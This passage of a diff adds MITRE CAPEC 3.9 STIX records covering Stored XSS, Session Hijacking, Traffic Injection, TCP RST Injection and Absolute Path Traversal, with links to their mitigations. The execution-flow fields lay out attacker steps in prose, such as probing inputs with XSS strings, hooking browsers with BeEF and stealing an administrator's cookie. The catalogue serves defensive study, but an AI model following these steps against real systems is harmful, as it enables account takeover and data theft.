"attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fail to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write malicious scripts and embed them into HTTP requests." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38865cc3-9b96-4cac-807c-bf7bad91ecd3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d36c215-a1eb-43b0-891e-fa3bab2cf037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34cccb39-8413-4427-800d-cb131ff13a29", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "target_ref": "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a form of Cross-site Scripting (XSS) where a malicious script is persistently \"stored\" within the data storage of a vulnerable web application as valid input.", + "external_references": [ + { + "external_id": "CAPEC-592", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/592.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-605", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Stored XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486" + ], + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Stored XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Stored XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Stored XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Stored XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary determines that a system uses a web based interface for administration. The adversary creates a new user record and supplies a malicious script in the user name field. The user name field is not validated by the system and a new log entry is created detailing the creation of the new user. Later, an administrator reviews the log in the administrative console. When the administrator comes across the new user entry, the browser sees a script and executes it, stealing the administrator's authentication cookie and forwarding it to the adversary. An adversary then uses the received authentication cookie to log in to the system as an administrator, provided that the administrator console can be accessed remotely.", + "An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of their message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application. The adversary is looking for areas where user input is stored, such as user profiles, shopping carts, file managers, forums, blogs, and logs.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for stored XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings to submit script in input fields that could be stored by the web application. If possible, the probe strings contain a unique identifier so they can be queried for after submitting to see if they are stored.
    Use a list of HTML special characters to submit in input fields that could be stored by the web application and check if they were properly encoded, replaced, or filtered out.

  2. Store malicious XSS content: Once the adversary has determined which stored locations are vulnerable to XSS, they will interact with the web application to store the malicious content. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

    3. Techniques
    Store a malicious script on a page that will execute when viewed by the victim.
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

    2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
", + "x_capec_extended_description": "\n Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attributes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fails to adequately sanitize or encode untrusted input.", + "An application that stores information provided by the user in data storage of some kind." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of varying complexity and to inject them through user controlled fields within the application." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28c01d45-e477-41b8-b923-e1a759ec7c34", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e027d6bd-c85f-4585-8bae-468b1e9f5507", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc721152-28b2-4c41-8360-1075efd36665", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "target_ref": "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.", + "external_references": [ + { + "external_id": "CAPEC-593", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/593.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Browser Session Hijacking", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Use Alternate Authentication Material:Application Access Token", + "external_id": "T1550.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/001" + }, + { + "description": "Remote Service Session Hijacking", + "external_id": "T1563", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1563" + }, + { + "description": "Session hijacking attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_hijacking_attack" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-603", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.html" + } + ], + "id": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Session Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Availability": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Integrity": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discover Existing Session Token: Through varrying means, an adversary will discover and store an existing session token for some other authenticated user session.

Experiment

  1. Insert Found Session Token: The attacker attempts to insert a found session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14" + ], + "x_capec_prerequisites": [ + "An application that leverages sessions to perform authentication." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to communicate with the application over the network." + ], + "x_capec_skills_required": { + "Low": "Exploiting a poorly protected identity token is a well understood attack with many helpful resources available." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. If the user logs back in then a new session key should be generated.", + "id": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-593-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b99d4053-f452-4a85-b020-ad0868cb52cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "target_ref": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.", + "external_references": [ + { + "external_id": "CAPEC-594", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/594.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Traffic Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (The injection of specific content into a connection can trigger a disruption in that communications channel, thereby denying availability of the service.)" + ], + "Integrity": [ + "Other (An adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.", + "external_references": [ + { + "external_id": "CAPEC-595", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/595.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Connection Reset", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64" + ], + "x_capec_prerequisites": [ + "This attack requires the ability to monitor the target's network connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-596", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/596.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TCP RST Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "An On/In Path Device" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.", + "external_references": [ + { + "external_id": "CAPEC-597", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/597.html" + }, + { + "external_id": "CWE-36", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/36.html" + } + ], + "id": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Absolute Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

    3. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.

    2. Techniques
    Access common files in root directories such as \"/bin\", \"/boot\", \"/lib\", or \"/home\"
    Access a specific drive letter or windows volume letter by specifying \"C:dirname\" for example
    Access a known Windows UNC share by specifying \"\\\\UNC\\share\\name\" for example

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

    2. Techniques
    Manipulate file and its path by injecting absolute path sequences (e.g. \"/home/file.txt\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_prerequisites": [ + "The target must leverage and access an underlying file system." + ], + "x_capec_resources_required": [ + "The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks.", + "Medium": "Programming attacks." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd5a0b68-7c46-4210-afeb-a383890ba931", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3a5fb6c7-5605-48a4-b2ca-bcfff3e93226", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ea68faae-9ff5-4a52-a520-135a612e4458", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70fb8b30-3f7c-41ef-a691-34c163c6e04b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa408ca1-01a2-404d-a24a-90d14b0fcdbe", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce2dd07c-e915-4e7b-90b5-8af1442e1aae", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 